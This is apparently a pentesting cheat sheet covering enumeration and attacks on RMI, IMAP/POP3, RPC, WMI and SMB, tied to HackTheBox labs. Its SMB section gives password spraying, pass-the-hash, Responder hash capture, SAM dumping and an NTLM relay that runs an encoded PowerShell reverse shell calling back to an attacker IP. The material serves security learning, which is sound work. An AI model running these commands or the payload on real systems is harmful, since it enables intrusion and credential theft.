    The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

    A Java RMI registry is a simplified name service that allows clients to get a reference (a stub) to a remote object.

    When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.

    ","tags":["java rmi","port 1090"]},{"location":"1090-java-rmi/#enumeration","title":"Enumeration","text":"
    # Dump information from the RMI registry.\nnmap --script rmi-dumpregistry -p 1099 <target>\n

    In this example, the name bound to the RMI server is\u00a0CustomRMIServer. It implements the\u00a0java.rmi.Remote\u00a0interface, as you would have expected. That is how one can invoke methods on the server remotely.

    remote-method-guesser is a Java RMI vulnerability scanner that is capable of identifying common RMI vulnerabilities automatically. Whenever you identify an RMI endpoint, you should give it a try:

    rmg enum $ip 9010\n
    ","tags":["java rmi","port 1090"]},{"location":"110-143-993-995-imap-pop3/","title":"Ports 110, 143, 993, 995 IMAP POP3","text":"

The Internet Message Access Protocol (IMAP) provides access to emails stored on a mail server.

Unlike the Post Office Protocol (POP3), IMAP allows online management of emails directly on the server and supports folder structures. Protocols such as IMAP are therefore needed for additional functionality such as hierarchical mailboxes directly on the mail server, access to multiple mailboxes during a session, and preselection of emails. IMAP is text-based and has extended functions, such as browsing emails directly on the server. It is also possible for several users to access the email server simultaneously. By default, IMAP works unencrypted and transmits commands, emails, usernames, and passwords in plain text. Depending on the method and implementation used, the encrypted connection uses the standard port 143 or an alternative port such as 993.

POP3, in contrast, only provides listing, retrieving, and deleting emails as functions at the email server. Depending on the method and implementation used, the encrypted connection uses the standard port 110 or an alternative port such as 995.

    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#footprinting-imap-pop3","title":"Footprinting IMAP / POP3","text":"
    sudo nmap $ip -sV -p110,143,993,995 -sC\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#connect-to-an-imap-pop3-server","title":"Connect to an IMAP /POP3 server","text":"
    curl -k 'imaps://$ip' --user user:p4ssw0rd -v\n

    To interact with the IMAP or POP3 server over SSL, we can use openssl, as well as ncat. The commands for this would look like this:

    openssl s_client -connect $ip:pop3s\n
    openssl s_client -connect $ip:imaps\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-imap-commands","title":"Basic IMAP commands","text":"
    # User's login\na LOGIN username password\n\n# Lists all directories\na LIST \"\" *\n\n# Creates a mailbox with a specified name\na CREATE \"INBOX\" \n\n# Deletes a mailbox\na DELETE \"INBOX\" \n\n# Renames a mailbox\na RENAME \"ToRead\" \"Important\"\n\n# Returns a subset of names from the set of names that the User has declared as being active or subscribed\na LSUB \"\" *\n\n# Selects a mailbox so that messages in the mailbox can be accessed\na SELECT INBOX\n\n# Exits the selected mailbox\na UNSELECT INBOX\n\n# Retrieves data (parts of the message) associated with a message in the mailbox\na FETCH <ID> all\n# If you want to retrieve the body:\na FETCH <ID> BODY.PEEK[TEXT]\n\n# Removes all messages with the `Deleted` flag set\na CLOSE\n\n# Closes the connection with the IMAP server\na LOGOUT\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-pop3-commands","title":"Basic POP3 commands","text":"
    # Identifies the user\nUSER username\n\n# Authentication of the user using its password\nPASS password\n\n# Requests the number of saved emails from the server\nSTAT\n\n# Requests from the server the number and size of all emails\nLIST \n\n# Requests the server to deliver the requested email by ID\nRETR id\n\n# Requests the server to delete the requested email by ID\nDELE id\n\n# Requests the server to display the server capabilities\nCAPA\n\n# Requests the server to reset the transmitted information\nRSET\n\n# Closes the connection with the POP3 server\nQUIT\n
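Analogous to the curl IMAP example above, curl can also drive a POP3 session non-interactively; a minimal sketch, assuming valid credentials:

# List messages over POP3S\ncurl -k 'pop3s://$ip/' --user user:p4ssw0rd\n\n# Retrieve the message with ID 1\ncurl -k 'pop3s://$ip/1' --user user:p4ssw0rd\n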
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#installing-a-mail-server-evolution","title":"Installing a mail server: Evolution","text":"
    sudo apt-get install evolution\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"111-32731-rpc/","title":"Port 111, 32731 - rpc","text":"

Provides information between Unix-based systems. The port is often probed: it can be used to fingerprint the *nix OS and to obtain information about available services. The port is used with NFS, NIS, or any RPC-based service. See rpcclient.

    Default port: 111/TCP/UDP, 32771 in Oracle Solaris.

    RPCBind + NFS
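A minimal enumeration sketch (rpcinfo and showmount ship with the standard rpcbind and NFS client packages; showmount is only useful when NFS is registered):

# List all RPC programs registered with the portmapper\nrpcinfo -p $ip\n\n# The same information via nmap\nnmap -sV -p111 --script=rpcinfo $ip\n\n# If NFS shows up, list the exported shares\nshowmount -e $ip\n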

    ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"135-windows-management-instrumentation-wmi/","title":"135 wmi","text":"

    Windows Management Instrumentation (WMI) is Microsoft's implementation and also an extension of the Common Information Model (CIM), core functionality of the standardized Web-Based Enterprise Management (WBEM) for the Windows platform. WMI allows read and write access to almost all settings on Windows systems. Understandably, this makes it the most critical interface in the Windows environment for the administration and remote maintenance of Windows computers, regardless of whether they are PCs or servers. WMI is typically accessed via PowerShell, VBScript, or the Windows Management Instrumentation Console (WMIC). WMI is not a single program but consists of several programs and various databases, also known as repositories.
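As a quick illustration of what WMI exposes, the same interface can be queried locally on a Windows host with WMIC or PowerShell (a sketch, not an attack):

# Query OS information with the legacy WMIC client\nwmic os get Caption,Version\n\n# Equivalent PowerShell CIM query\nGet-CimInstance -ClassName Win32_OperatingSystem | Select-Object Caption,Version\n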

    "},{"location":"135-windows-management-instrumentation-wmi/#footprinting-the-service","title":"Footprinting the service","text":"

    The initialization of the WMI communication always takes place on TCP port 135, and after the successful establishment of the connection, the communication is moved to a random port. For example, the program wmiexec.py from the Impacket toolkit can be used for this.

    /usr/share/doc/python3-impacket/examples/wmiexec.py <username>:<\"password\">@$ip <hostname>\n
    "},{"location":"135-windows-management-instrumentation-wmi/#source","title":"Source","text":"

    HackTheBox Academy

    "},{"location":"137-138-139-445-smb/","title":"Ports 137, 138, 139, 445 SMB","text":"

Server Message Block (SMB) is a client-server protocol that regulates access to files, entire directories, and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, but the free software project Samba also enables the use of SMB on Linux and Unix distributions, and thus cross-platform communication via SMB.

Basically, an SMB server provides arbitrary parts of its local file system as shares. The hierarchy visible to a client is therefore partially independent of the structure on the server.

Samba is an alternative variant of the SMB server, developed for Unix-based operating systems. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a \"dialect\" of SMB; in other words, a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems, which is why it is usually referred to as SMB / CIFS. When we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports 137, 138, and 139, whereas CIFS uses TCP port 445 only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

| SMB Version | Supported | Features |
| --- | --- | --- |
| CIFS | Windows NT 4.0 | Communication via NetBIOS interface |
| SMB 1.0 | Windows 2000 | Direct connection via TCP |
| SMB 2.0 | Windows Vista, Windows Server 2008 | Performance upgrades, improved message signing, caching feature |
| SMB 2.1 | Windows 7, Windows Server 2008 R2 | Locking mechanisms |
| SMB 3.0 | Windows 8, Windows Server 2012 | Multichannel connections, end-to-end encryption, remote storage access |
| SMB 3.0.2 | Windows 8.1, Windows Server 2012 R2 | |
| SMB 3.1.1 | Windows 10, Windows Server 2016 | Integrity checking, AES-128 encryption |
    • On Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP
• but if Windows has NetBIOS enabled, or we are targeting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.

    In a network, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an application programming interface (API) for networking computers called the Network Basic Input/Output System (NetBIOS). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called name registration procedure. Either each host reserves its hostname on the network, or the NetBIOS Name Server (NBNS) is used for this purpose. It also has been enhanced to Windows Internet Name Service (WINS).
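Name registration can be observed directly: the Samba suite's nmblookup (or nmap's nbstat script) will dump a host's NetBIOS name table; a sketch:

# Node status lookup: list all NetBIOS names registered by the target\nnmblookup -A $ip\n\n# The same via nmap\nsudo nmap -sU -p137 --script=nbstat $ip\n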

Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer with a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#footprinting-smb","title":"Footprinting smb","text":"

    nmap

    sudo nmap $ip -sV -sC -p139,445\n\n# Script for nteracting with the SMB service to extract the reported operating system version.\nnmap --script smb-os-discovery.nse -p445 $ip\n\n# Service scanning\nnmap -A -p445 $ip\n

    smbmap

    # Enumerate network shares and access associated permissions.\nsmbmap -H $ip \n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#typical-attacks","title":"Typical attacks","text":"

    For some of these attacks we will use smbclient. See installation, connection and syntax in smbclient

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#1-null-attack","title":"1. Null attack","text":"
    # Connect to smb [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

    Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.

Without the -N parameter, a password will be prompted for. We leave the password field blank, simply hitting Enter to tell the script to move along.

    After authenticating, we may obtain access to some typical shared folders, such as:

    ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

    We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

    # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#2-smb2-security-levels","title":"2. smb2 security levels","text":"

    To detect it, run:

    nmap --script smb2-security-mode -p 445 $ip\n# Add -Pn to avoid firewall if needed\n

    Output:

| smb2-security-mode:\n|   2.02:\n|_    Message signing enabled but not required\n

    There are three potential results for the message signing:

    1. Message signing disabled.

    2. Message signing enabled but not required (default for SMB2).

    3. Message signing enabled and required.

    Options 1 and 2 are vulnerable to SMB relay attacks. Option 3 is the most secure option.

In case 1, the attack is similar to the first vulnerability. In case 2, we can bypass the login by leaving the password blank but including the user in the request:

    smbclient -L \\\\$ip -U Administrator\n# -L: retrieve a list of available shares on the remote host\n# -U: user \n\nsmbclient -N -L \\\\$ip\n# -N: Suppresses the password prompt.\n

Important: Sometimes some juggling with the escaping of the slashes is needed:

    smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#3-signing-enabled-but-not-required","title":"3. Signing enabled but not required","text":"

    HackTheBox machine: Tactics

After running an nmap scan with scripts enabled (nmap -sC -A 10.129.228.98 -Pn -p-), you get this response:

| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n

This will allow us to use smbclient share enumeration without needing to provide a password when signing into the shared folder. For that, we will use a well-known Windows user: Administrator.

    smbclient -L $ip -U Administrator\n

The same thing is possible with rpcclient:

    # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#4-brute-force","title":"4. Brute force","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#user-enumeration-with-rpcclient","title":"User enumeration with rpcclient","text":"
    # Brute forcing user enumeration with rpcclient:\nfor i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#password-spraying-with-crackmapexec","title":"Password spraying with crackmapexec","text":"
    crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#module-smb_login-in-metasploit","title":"Module smb_login in metasploit","text":"

With Metasploit, use the auxiliary/scanner/smb/smb_login module, as in the sketch below.
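A minimal msfconsole session might look like this (the wordlist paths are placeholders):

msfconsole -q\nuse auxiliary/scanner/smb/smb_login\nset RHOSTS $ip\nset USER_FILE /folder/userlist.txt\nset PASS_FILE /folder/passlist.txt\nset STOP_ON_SUCCESS false\nrun\n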

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#5-remote-code-execution-rce-with-psexec-smbexec-crackmapexec","title":"5. Remote Code Execution (RCE) with PsExec, SmbExec, crackMapExec","text":"

    PsExec\u00a0is a tool from SysInternals Suite that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

Alternatives to PsExec from SysInternals: Impacket PsExec, Impacket SMBExec, Impacket atexec (executes a command on the target machine through the Task Scheduler service and returns the output of the executed command), CrackMapExec, and Metasploit PsExec (a Ruby PsExec implementation).

    # Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-atexec  administrator:'<password>'@$ip\n

    RCE with crackmapexec:

# If --exec-method is not defined, CrackMapExec will try the atexec method; if it fails, you can specify --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#6-pass-the-hash-pth-with-crackmapexec","title":"6. Pass the Hash (PtH) with crackmapexec","text":"
    # Using a hash instead of a password to authenticate ourselves: Pass the Hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#7-forced-authentication-attacks","title":"7. Forced Authentication Attacks","text":"

    We can also abuse the SMB protocol by setting up a fake SMB server to capture users' NetNTLM v1/v2 hashes. The most common tool for this is Responder, an LLMNR, NBT-NS, and MDNS poisoner with several capabilities, one of which is standing up rogue services, including SMB, to steal NetNTLM v1/v2 hashes.

    ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

    All saved hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using hashcat module 5600.

    hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#8-ntlm-relay-attack","title":"8. NTLM relay attack","text":"

    If we capture a hash but cannot crack it, we can try an NTLM relay attack with impacket-ntlmrelayx or Responder's MultiRelay.py.

    Step 1: Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

    cat /etc/responder/Responder.conf | grep 'SMB ='\n
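    To actually flip the value, a one-liner such as the following can be used (a sketch assuming the stock SMB = On entry in the file):

    sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf\n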

    Step 2: Launch proxy and get SAM database

    # impacket-ntlmrelayx will dump the SAM database by default\nimpacket-ntlmrelayx --no-http-server -smb2support -t $ip\n# --no-http-server: do not start the rogue HTTP server (we only relay SMB here)\n# -smb2support: add support for SMB2\n# -t: target IP\n

    Step 3: Create a PowerShell reverse shell using\u00a0https://www.revshells.com/

    # Use option to encode it in base 64\npowershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA\n

    Step 4: Use the captured hash to launch a reverse shell. Commands in impacket-ntlmrelayx can be executed with flag -c.

     impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'\n

    Step 5: Finally, launch a listener. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.

    nc  -lnvp 9002\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#9-smbghost","title":"9. SMBGhost","text":"

    SMBGhost is the name given to CVE-2020-0796.

    The vulnerability consisted of a compression mechanism in SMB v3.1.1 that made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. It allowed the attacker to gain remote code execution (RCE) and full access to the remote target system. In simple terms, it is an integer overflow vulnerability in a function of an SMB driver that allows system commands to be overwritten while accessing memory.
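    To check whether a target negotiates the vulnerable SMB 3.1.1 dialect, the smb-protocols NSE script can help (a quick sketch, not a full vulnerability check):

    nmap -p445 --script smb-protocols $ip\n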

    POC: https://www.exploit-db.com/exploits/48537

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enumeration","title":"Enumeration","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#rpcclient","title":"rpcclient","text":"

    See RPC installation and basic commands.

    The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A list of some of these functions can be found at rpcclient. Most importantly, anonymous access to such services can also lead to the discovery of other users (see the list of commands for the rpcclient tool), who can be attacked with brute-forcing in the most aggressive case.

    Brute forcing user enumeration with rpcclient:

    for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n

    Quick cheat sheet:

    # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n# rpcclient -U'%' $ip\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#samrdump-from-impacket","title":"samrdump from impacket","text":"

    An alternative for user enumeration would be a Python script from Impacket called samrdump.py.
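    A possible invocation, assuming the Kali Impacket wrapper is installed (credentials are optional placeholders):

    # Attempt a null session first\nimpacket-samrdump $ip\n\n# Or authenticate explicitly\nimpacket-samrdump <domain>/<username>:<password>@$ip\n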

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#smbmap","title":"SMBMap","text":"

    SMBMap tool is widely used and helpful for the enumeration of SMB services. Quick cheat sheet:

    # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# Enumerate network shares and associated permissions recursively\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#crackmapexec","title":"CrackMapExec","text":"

    CrackMapExec is widely used and helpful for the enumeration of SMB services.

    crackmapexec smb $ip --shares -u '' -p ''\n

    Quick cheat sheet:

    # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Password spraying technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targeting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get SAM: extract hashes of all users authenticated to the machine\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged-on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password to authenticate ourselves: Pass the Hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enum4linux","title":"Enum4Linux","text":"

    Complete cheat sheet. Enum4linux is another utility that supports null sessions. It utilizes nmblookup, net, rpcclient, and smbclient to automate common enumeration of SMB targets:

    ./enum4linux-ng.py 10.10.11.45 -A -C\n

    Quick cheat sheet:

    # Enumerate shares\nenum4linux -S $ip\n\n# Enumerate users\nenum4linux -U $ip\n\n# Enumerate machine list\nenum4linux -M $ip\n\n# Enumerate the password policy of the remote system, useful for mounting a network authentication (brute-force) attack\nenum4linux -P $ip\n\n# Specify username to use (default \"\")\nenum4linux -u <username> $ip\n\n# Specify password to use (default \"\")\nenum4linux -p <password> $ip\n\n# You can also brute force share names by adding a file\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux -n $ip\n# In the result, the <20> flag means there are resources shared\n

    If you want to run all these commands in one line:

    enum4linux -a $ip\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#interacting-with-smb-using-windows-linux","title":"Interacting with SMB using Windows & Linux","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#windows","title":"Windows","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-the-explorer","title":"Using the explorer","text":"

    [WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\\\$IP$\\Finance\\

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-cmd","title":"Using cmd","text":"
